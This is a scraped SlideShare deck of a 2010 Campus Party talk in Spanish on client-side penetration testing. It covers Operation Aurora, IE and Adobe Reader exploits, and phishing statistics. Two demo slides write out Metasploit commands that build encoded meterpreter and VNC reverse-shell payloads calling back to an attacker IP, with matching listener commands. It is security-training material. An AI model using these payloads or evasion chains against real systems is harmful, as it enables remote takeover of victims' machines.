Successfully reported this slideshow.
What Work’s On
Client Side Pentesting
           CAMPUS PARTY COLOMBIA 2010




   I’m a Pentester         I’m a User
Leonardo Pigñer




             www.base4sec.com


                  @base4sec
iLife
kungfoosion.com

@kfs
lpigner@base4sec.com


www.linkedin.com/in/lpigner
ekoparty.org
16-17 Septiembre 2010
Agenda
•   ¿ Por Qué Client Side ?

•   La Operación Aurora

•   Distribución y Ataques

•   Conclusión
¿ Por Qué Client Side ?
DIFERENTES TIPOS DE PENETRATION TESTING

                   No! Yo tengo       Jodanse!
  Wardialing      un 0-day para   ...
INTERNET

                                       ATACANTE




           Firewall
                          DMZ


        ...
INTERNET

                                         ATACANTE




                                 Web App FW
              ...
INTERNET



 Firewall   DMZ



LAN
Agenda
•   ¿ Por Qué Client Side ?

•   La Operación Aurora

•   Distribución y Ataques

•   Conclusión
La Operación
   Aurora
12 de Enero
            de 2010




                “ataques altamente sofisticados y
               dirigidos ... originad...
+ 30
[1] Wikipedia: Operation Aurora
“Operación Aurora”
Google se va de China (?)
Google.cn
Google.com.ar
“illegal
          flower
         tribute”
[4] Wikipedia: Illegal flower tribute
PDF, DOC, XLS, CAD, E-mail
                                                                      Texas
      y el resto......
0-day para IE 6-7-8

          -   12 de Enero: Anuncio de Google
          -   14 de Enero: Exploit en Wepawet
          ...
www




DEMO #1 “Aurora”
Mas información en:
KUNGFOOSION: Estalló la CyberGuerra!
OSVDB 61697
This module exploits a memory corruption flaw in Internet
Explorer. This flaw was found in the wild and was a ke...
Agenda
•   ¿ Por Qué Client Side ?

•   La Operación Aurora

•   Distribución y Ataques

•   Conclusión
Distribución y Ataques
payload
   +
encoding
DEMO #2 “Payload + Encoding”

./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.162.138 LPORT=443 X > payload_1.e...
Tienes un E-Mail
CASO de ESTUDIO (?)
25000 mails


1883 interesados
Browsers
Sistema
Operativo
Soporte de Java
Versiones
de Flash
Abre mi
          adjunto!




Tienes un E-Mail
Archivos Mas Utilizados

      3%

                     38%
47%


                7%
           4%




DOC    XLS         ...
2008
                                              1968
                                               2009
              ...
DEMO #3 “PDF Exploit”
Mas información en:
KUNGFOOSION: Explotando el 0-day de Adobe
Reader
OSVDB 61697
This module exploits a buffer overflow in Adobe Reader
and Adobe Acrobat Professional < 8.1.3. By creating a
sp...
+EXE




DEMO #4 “PDF + EXE”
Mas información en:
KUNGFOOSION: Embebiendo un Ejecutable dentro
de un PDF con MetaSploit
+ EXE
2008
                                              1968
                                               2009
              ...
DEMO #5 “Word”
DEMO #5 “Word”
./msfpayload windows/vncinject/reverse_tcp
LHOST=192.168.162.138 LPORT=443 V >
macro_word.bas


./msfcli ex...
La Recepcionista
DEMO #6 “USB U3”
Mas información en:
KUNGFOOSION: Ataque USB U3 con MetaSploit
SET
                      social engineering toolkit



“The Java Applet Attack”
Mas información en:
KUNGFOOSION: Ingenier...
Conclusión
Preguntas ?
Gracias!
kungfoosion.com

@kfs
lpigner@base4sec.com


www.linkedin.com/in/lpigner
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Leonardo pigner sy_r_campusparty2010
Upcoming SlideShare
Loading in …5
×

Leonardo pigner sy_r_campusparty2010

1,857 views

Published on

CParty 2010

Published in: Technology
  • injusto que no se puedan descargar
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Leonardo pigner sy_r_campusparty2010

  1. 1. What Work’s On Client Side Pentesting CAMPUS PARTY COLOMBIA 2010 I’m a Pentester I’m a User
  2. 2. Leonardo Pigñer www.base4sec.com @base4sec
  3. 3. iLife kungfoosion.com @kfs lpigner@base4sec.com www.linkedin.com/in/lpigner
  4. 4. ekoparty.org 16-17 Septiembre 2010
  5. 5. Agenda • ¿ Por Qué Client Side ? • La Operación Aurora • Distribución y Ataques • Conclusión
  6. 6. ¿ Por Qué Client Side ?
  7. 7. DIFERENTES TIPOS DE PENETRATION TESTING No! Yo tengo Jodanse! Wardialing un 0-day para Yo entro es lo mejor! IIS 6.0! caminando Phone Attacker Network Attacker Social Engineer
  8. 8. INTERNET ATACANTE Firewall DMZ LAN SMTP WWW DOMINIO BASE DE DATOS
  9. 9. INTERNET ATACANTE Web App FW IPS Firewall Reverse Proxy DMZ IDS LAN SMTP WWW DOMINIO BASE DE DATOS
  10. 10. INTERNET Firewall DMZ LAN
  11. 11. Agenda • ¿ Por Qué Client Side ? • La Operación Aurora • Distribución y Ataques • Conclusión
  12. 12. La Operación Aurora
  13. 13. 12 de Enero de 2010 “ataques altamente sofisticados y dirigidos ... originados desde China” [2] Google Blog: A new approach to China
  14. 14. + 30 [1] Wikipedia: Operation Aurora
  15. 15. “Operación Aurora”
  16. 16. Google se va de China (?)
  17. 17. Google.cn
  18. 18. Google.com.ar
  19. 19. “illegal flower tribute” [4] Wikipedia: Illegal flower tribute
  20. 20. PDF, DOC, XLS, CAD, E-mail Texas y el resto... Taiwan AR ,R C AB [3] Mandiant M-Trends “the advanced persistent threat”
  21. 21. 0-day para IE 6-7-8 - 12 de Enero: Anuncio de Google - 14 de Enero: Exploit en Wepawet - 14 de Enero: Advisory de Microsoft - 15 de Enero: PoC de MetaSploit - 21 de Enero: Microsoft update (fuera de ciclo) [6] Wepawet exploit [7] German government warns against using MS Explorer
  22. 22. www DEMO #1 “Aurora” Mas información en: KUNGFOOSION: Estalló la CyberGuerra!
  23. 23. OSVDB 61697 This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the "Operation Aurora" attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited. Afecta a: - Internet Explorer 6 - Internet Explorer 7 - Internet Explorer 8
  24. 24. Agenda • ¿ Por Qué Client Side ? • La Operación Aurora • Distribución y Ataques • Conclusión
  25. 25. Distribución y Ataques
  26. 26. payload + encoding
  27. 27. DEMO #2 “Payload + Encoding” ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 X > payload_1.exe ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 R | msfencode -e x86/ shikata_ga_nai -c 10 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/ call4_dword_xor -c 3 -t exe -o payload_2.exe ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/ reverse_tcp LHOST=192.168.162.138 LPORT=443 E
  28. 28. Tienes un E-Mail
  29. 29. CASO de ESTUDIO (?)
  30. 30. 25000 mails 1883 interesados
  31. 31. Browsers
  32. 32. Sistema Operativo
  33. 33. Soporte de Java
  34. 34. Versiones de Flash
  35. 35. Abre mi adjunto! Tienes un E-Mail
  36. 36. Archivos Mas Utilizados 3% 38% 47% 7% 4% DOC XLS PPT PDF otros
  37. 37. 2008 1968 2009 2195 2010 895 [8] PDF Based Target Attacks are Increasing
  38. 38. DEMO #3 “PDF Exploit” Mas información en: KUNGFOOSION: Explotando el 0-day de Adobe Reader
  39. 39. OSVDB 61697 This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code. Afecta a: - Adobe Reader 8.1.2
  40. 40. +EXE DEMO #4 “PDF + EXE” Mas información en: KUNGFOOSION: Embebiendo un Ejecutable dentro de un PDF con MetaSploit
  41. 41. + EXE
  42. 42. 2008 1968 2009 2195 2010 895 [8] PDF Based Target Attacks are Increasing
  43. 43. DEMO #5 “Word”
  44. 44. DEMO #5 “Word” ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 V > macro_word.bas ./msfcli exploit/multi/handler PAYLOAD=windows/ vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 E
  45. 45. La Recepcionista
  46. 46. DEMO #6 “USB U3” Mas información en: KUNGFOOSION: Ataque USB U3 con MetaSploit
  47. 47. SET social engineering toolkit “The Java Applet Attack” Mas información en: KUNGFOOSION: Ingeniería Social con Applets firmados de Java en MetaSploit
  48. 48. Conclusión
  49. 49. Preguntas ?
  50. 50. Gracias! kungfoosion.com @kfs lpigner@base4sec.com www.linkedin.com/in/lpigner

×